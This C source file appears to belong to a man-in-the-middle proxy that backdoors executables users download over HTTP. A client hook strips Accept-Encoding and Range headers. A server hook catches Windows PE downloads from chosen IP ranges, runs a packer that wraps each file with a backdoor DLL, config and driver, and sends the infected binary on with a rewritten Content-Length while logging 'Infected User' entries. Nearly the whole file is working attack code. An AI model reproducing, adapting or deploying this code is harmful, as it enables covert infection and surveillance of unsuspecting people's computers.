#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "jproxy.h"
#include "jhook.h"
#include "jlog.h"
#include "utils.h"

#define PRIO_NORMAL 1


// HOOKS

/* server exe PE injection hook */

#define BACKDOOR_FILE_PATH "/tmp/RCS_DEF"
#define DOWNLOAD_FILE_PATH "/tmp/download"
#define TMP_FILE_NAME      "executable.exe"
#define PACKER_NAME        "proxydrop"

static FILE *bin_new=NULL;
static size_t pe_max_file_size = 0;


static char *inject_dll    = NULL;
static char *inject_conf   = NULL;
static char *inject_path   = NULL;
static char *inject_driver = NULL;
static char *inject_dir    = NULL;


static char *get_field_from_file(FILE *file, const char* field)
{
  char *c;
  char buffer[256], tmp[256];
  while( fgets(buffer, 256, file) != NULL)
  {
    c = buffer;
    c = strstr(c, "=");  
    if(c == NULL)
      continue; 

    memset(tmp, 0x00, sizeof(tmp));     
    memcpy(tmp, buffer, c - buffer);

  //  fprintf(stderr, "[DEBUG] Scanning: %s\n", tmp);

    if(!strcmp(tmp, field))
    {
      c++;
      c[strlen(c) - 1] = '\0';
      
      return strdup(c);
    }

  }

  return NULL;
}


static int server_bin_inject_init(ip_entry_t *entry)
{
  int fd_dir;
  pe_max_file_size = entry->max_file_size;
  char *dir = (entry->bd_path) ? entry->bd_path : BACKDOOR_FILE_PATH;
  
  fd_dir = open(dir, O_RDONLY); 

  if(fd_dir < 0)
  {
    D_LOG(MSG_ERROR, "Unable To Open Directoy: %s Hook Failed\n", dir);
    return -1;
  }

  struct stat s;
  memset(&s, 0x00, sizeof(s));
  fstat(fd_dir, &s);
  close(fd_dir);

  if(!S_ISDIR(s.st_mode))
  {
    D_LOG(MSG_ERROR, "%s is Not a Directoy: Hook Failed\n", dir);
    return -1;
  }

  char buffer[256];
  snprintf(buffer, 256, "%s/RCSDEF", dir);
  FILE* rcs_def = fopen(buffer, "r");
  if(rcs_def == NULL)
  {
    D_LOG(MSG_ERROR, "Unable To Open RCSDEF file in: %s Hook Failed\n", buffer);
    return -1;
  }

  inject_dll    = get_field_from_file(rcs_def, "HCORE");
  inject_conf   = get_field_from_file(rcs_def, "HCONF");
  inject_driver = get_field_from_file(rcs_def, "HEXT1");
  inject_path   = get_field_from_file(rcs_def, "HDIR");
  inject_dir    = strdup(dir);
  fclose(rcs_def);

  if( !inject_dll || !inject_conf || !inject_path )
  {
    D_LOG(MSG_ERROR, "Unable To Find RCSDEF field in: %s Hook Failed\n", buffer);
    return -1;
  }

  if( entry->ext_type & EXT_EXE ) // register if exe is used
  {
    D_LOG(MSG_INFO, "Backdoor Info: - dll: %s, conf: %s, path: %s, driver: %s, dir: %s\n", inject_dll, inject_conf, inject_path, inject_driver, inject_dir); 
    return 1;
  }

  return 0;
}

void bbb() {}

static int server_bin_inject( df_t **new_df, int query, int *to_do, struct client_request *request, ip_entry_t* ip_entry)
{
  /* session enviroment */
  static df_t *ancillary_df=NULL;
  static int first_body=0;
  df_t *cur = *new_df;// *chunk_df;
  

  if(cur == NULL)
    return 0;
  
  if( !(request->__hook & (__MSG_BIN_HOOKED|__MSG_BIN_TRACKED))) // init_session
  {
    if( ancillary_df )
      free_df(ancillary_df);
    ancillary_df=NULL; 

    if(bin_new)
      fclose(bin_new);
   
    bin_new=NULL; 
    first_body = 0;
   
    request->__hook |= __MSG_BIN_HOOKED;
  }

  if( request->__hook & __MSG_BIN_INGNORED ) // if ignored skip the hook
    return 0;
  
  if(request->__hook & __MSG_BIN_HOOKED)
  {
    if( (cur->type & DF_HEADER) && (cur->flags & DF_F_EOF)) 
    {
      if( ((request->info_client & REQUEST_TYPE_MSDOS) || (request->info_server & REQUEST_TYPE_MSDOS)) 
            && (request->__body_type & __MSG_BODY_HAS_CONTENT_LENGTH) && request->total_len <= pe_max_file_size && ip_entry->max_infect > 0) 
              // track it if match and if has a valid range Content-Length 
      { 
        request->__hook &= ~__MSG_BIN_HOOKED;
        request->__hook |=  __MSG_BIN_TRACKED; 
        *new_df = NULL;

        D_LOG(MSG_INFO, "EXE detected, erase Content-Length and save header EOF in ancillary data");
      }
      else
      {
        request->__hook |= __MSG_BIN_INGNORED;
        if( ancillary_df ) // there Content-Length apart...
        {
          cur->ancillary = ancillary_df;
          ancillary_df = NULL;
          D_LOG(MSG_DEBUG, "Restoring Ancillary Content-Lenght in the First Body in the EOF header terminator df");
        }
      }
    }
    else if( cur->type == DF_HEADER ) // take COntent-Length Header apart..
    {
      size_t rest;
      if( line_strmem_nocase(cur->data, "Content-Length:", &rest) )
      {
        ancillary_df = cur;
        D_LOG(MSG_DEBUG, "Skipping Content-Length header before inspecting body");
        *new_df = NULL;
        return 1;
      }
    }        
    else 
      assert(0);
  }

  
  if( request->__hook & __MSG_BIN_TRACKED ) // TODO
  {
    assert( cur->type != DF_HEADER || (cur->type == DF_HEADER && cur->flags & DF_F_EOF) );
  
    if( cur->type == DF_HEADER && cur->flags & DF_F_EOF ) // header EOF of the tracked download
    {
      bin_new = fopen(DOWNLOAD_FILE_PATH, "w+"); 
      assert( bin_new );

      free_df(cur);

      *new_df = NULL;  // NOW we must supplied a valid Content-Length and a header EOF before putting out the entire stream
      return 1;
    }
    else if( cur->type != DF_HEADER )
    {
        assert( cur->type == DF_RAW );
        if(!first_body) // first body payload (analyze if it is really an PE EXE )
        {
          first_body = 1;
          if( !is_exe_payload(cur->data, cur->size) ) // if false positive: not an exe.. restore context...
          {
            df_t *eof = alloc_empty_line_df();
            cur->ancillary = eof;
            eof->ancillary = ancillary_df;
            ancillary_df = NULL;
            
            D_LOG(MSG_INFO, "False Positive EXE: restoring defalt context");
            request->__hook |= __MSG_BIN_INGNORED;
            return 1;
          }
        }
        if( request->__status & __MSG_COMPLETED )
        {
            df_t *df, *eof, *len;
            size_t size;
            char *data;
            FILE *tmp_file;
            
            fwrite(cur->data, cur->size, 1, bin_new);
            fflush(bin_new);
            jfree(cur);
           
            char buffer[256]; 
            snprintf(buffer, 256, "%s/%s", inject_dir, TMP_FILE_NAME); 
            tmp_file = fopen(buffer, "w+"); 
            assert( tmp_file ); 
            
            bbb(); 
            rewind(bin_new);
            copy_file(bin_new, tmp_file);
            fflush(tmp_file);
            fclose(tmp_file);

            /* change pwd, the packer must in the same dir */
            char pwd[1024];
            getcwd(pwd, 1024);

            int ret = chdir(inject_dir);
            assert( ret != -1 );

            char command[1024];
            if(inject_driver) {
               snprintf(command, 1024, "%s %s \\\\%s\\\\ %s %s %s", PACKER_NAME, TMP_FILE_NAME, inject_path, inject_dll, inject_conf, inject_driver); 
            } else {
               snprintf(command, 1024, "%s %s \\\\%s\\\\ %s %s", PACKER_NAME, TMP_FILE_NAME, inject_path, inject_dll, inject_conf); 
            }
            D_LOG(MSG_INFO, "Command: %s\n", command);
            system(command);
  
            chdir(pwd);
            
            tmp_file = fopen(buffer, "r");
            assert(tmp_file);
            
            size = get_file_size(fileno(tmp_file)); // get tmp file size
            
            data = jmalloc(size);
            assert( data );
            
            rewind(tmp_file);
            fread(data, size, 1, tmp_file);
            fclose(tmp_file);  
            unlink(buffer);

            df = alloc_df(data, size, DF_RAW, 0);

            /* create df for Content-Length: xxx and for header EOF */

            eof = alloc_empty_line_df();
            len = alloc_content_length_df(size);

            eof->ancillary = len;
            df->ancillary  = eof;

            *new_df = df; // three DF chain..
            ip_entry->max_infect--; // decrement infect counter
            D_LOG(MSG_INFO, "Infected User on Ip-Entry: 0x%x-0x%x", ip_entry->start, ip_entry->end);
            fprintf(infect_file, "Infected Ip Entry: %s-%s\n", convert_ip(ip_entry->start), convert_ip(ip_entry->end));
            fflush(infect_file);
            return 1;
            
        }
        else
        {
          fwrite(cur->data, cur->size, 1, bin_new);
          free_df(cur);
          *new_df = NULL;
          return 1;
        }
    } 
  }
  return 0;
}

static struct hook_desc srv_bin_inject = { &server_bin_inject, "Server PE Injec", PRIO_NORMAL, &server_bin_inject_init };



/* client protocol downgrade hook */
static int client_accept_downgrade( df_t **new_df, int query, int *to_do, struct client_request *request, ip_entry_t *ip_entry) 
{
  df_t* cur = *new_df;
  
  if( cur->type == DF_HEADER )
  {
    size_t rest;
    char* tmp = line_strmem_nocase(cur->data, "Accept-Encoding:",  &rest);
    if( !tmp )
      tmp = line_strmem_nocase(cur->data, "Range:", &rest);  // TODO: add client flag to signal when performing it...
    if( tmp )
    { 
      { // DEBUG
        char *str = line_get_str(cur->data);
        D_LOG(MSG_DEBUG, "Skipping out header line: %s", str);
        jfree(str);
      }
      free_df(cur);
      *new_df = NULL;
      *to_do |= INJECT_HOOK_DATA_BUFFERED;
      return 1;
    }
  }

  return 0;
  
}


static struct hook_desc clt_accept_downgrade 
    = { &client_accept_downgrade, "Client Accept Header Downgrade", PRIO_NORMAL, NULL  };



/* core */
int call_hook_chain(struct hook_filter_chain *hook_chain, df_t **orig, struct client_request *req, ip_entry_t *ip_entry)
{
  size_t i,ret,num=0;
  int todo=0;
  filter_hook f_hook;

  assert( hook_chain && orig && *orig && req );
  df_t *df = *orig;
  for( i=0; i < hook_chain->index; i++ )
  {
    f_hook = hook_chain->array[i]->hook; 
    assert( f_hook );

    //D_LOG(MSG_DEBUG, "Processing Hook: %s", hook_chain->array[i]->desc);
    
    todo=0;
    ret = (*f_hook)(&df, INJECT_QUERY_CAN_HOOK, &todo ,req, ip_entry);
    if( ret )
      num++;

    if( todo & INJECT_HOOK_ERROR )
    {
      D_LOG(MSG_ERROR, "Error Processing %s hook", hook_chain->array[i]->desc);
    } 

    if( todo & INJECT_HOOK_FATAL )
    {
      D_LOG(MSG_ERROR, "Fatal Error Processing %s hook", hook_chain->array[i]->desc);
      return -1;
    }

    if( !df ) // hook take data ownership.. 
    {
      *orig = df;
      return num;
    }
    
  } // for()

  *orig = df;
  return num;
}


/* we must add filter hook during init_hook_engine() at the program inizialization routine.. */
static inline int add_filter_hook(struct hook_filter_chain *chain, struct hook_desc* hook, ip_entry_t *entry)
{
  int err;
  assert( chain->index+1 <= MAX_HOOK );

  D_LOG(MSG_DEBUG, "Added %s hook", hook->desc);

  if( chain->index+1 == MAX_HOOK )
    return 0;

  if( hook->init )
  {
    err = hook->init(entry);
    if( err < 0 )
    {
      D_LOG(MSG_ERROR, "Failed To Inizialize Hook Function: %s", hook->desc);
      return 0;
    }
    else if( err == 0)
    {
      D_LOG(MSG_ERROR, "Hook Not Registered For This Session: %s", hook->desc);
      return 0;
    }
  }
  chain->array[chain->index++] = hook;
  return 1;
}


/* globally used chain in this version !! */
struct hook_filter_chain g_client_filter_chain;
struct hook_filter_chain g_server_filter_chain;

//static struct 

/* TODO: add real filter .. */
ip_entry_t * init_hook_engine(char *ip)
{
  unsigned int ip_num;
  
  memset(&g_client_filter_chain, 0x00, sizeof(struct hook_filter_chain));
  memset(&g_server_filter_chain, 0x00, sizeof(struct hook_filter_chain));
  
  get_ip(ip, &ip_num);

  ip_entry_t *entry = get_ip_entry_from_ip(ip_num);
  if( !entry )
    return NULL;
        
  /* add CLIENT filter chain */
  add_filter_hook(&g_client_filter_chain,  &clt_accept_downgrade, entry);

  /* add SERVER filter chain */
  add_filter_hook(&g_server_filter_chain, &srv_bin_inject, entry);

  return entry;
}

